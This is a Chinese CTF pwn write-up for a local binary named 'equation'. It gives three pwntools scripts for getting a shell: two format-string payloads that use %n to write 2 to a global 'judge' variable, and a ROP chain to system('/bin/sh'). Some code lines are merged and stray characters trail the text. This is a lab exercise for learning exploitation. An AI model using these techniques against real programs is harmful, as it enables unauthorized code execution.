查看保护
再看ida
很明了,题目就是让我们用格式化字符串漏洞修改judge的值(可以用python脚本进行计算,最终算出来得2)使等式成立,然后getshell。
虽然操作比较简单,但我还是列出了几种方法
解法一:
from pwn import*
context(log_level='debug')
p=process('./equation')
judge=0x60105Cpayload=b'bb'+b'%9$n'+b'aaa'+p64(judge)
p.sendline(payload)
p.interactive()这个方法应该比较常见,这里不多解释。
解法二:
from pwn import*
context(log_level='debug')
p=process('./equation')
judge=0x60105Cpayload=b'b'+b'%1c%9$n'+b'b'+p64(judge)
p.sendline(payload)
p.interactive()这里运用到了%c和%n的搭配,这里要注意栈帧结构,就是让judge的地址单独占一个栈帧,不然没有办法正确修改judge的值
解法三:
from pwn import*
p=process('./equation')system_plt=0x4004E0
sh=0x400774
pop_rdi=0x400753
ret=0x4004cepayload=b'a'*0x9+p64(ret)+p64(pop_rdi)+p64(sh)+p64(system_plt)
p.sendline(payload)
p.interactive()这个是非正常解法,最好还是自己用格式化字符串漏洞去解。
)
)
)
)
)
)
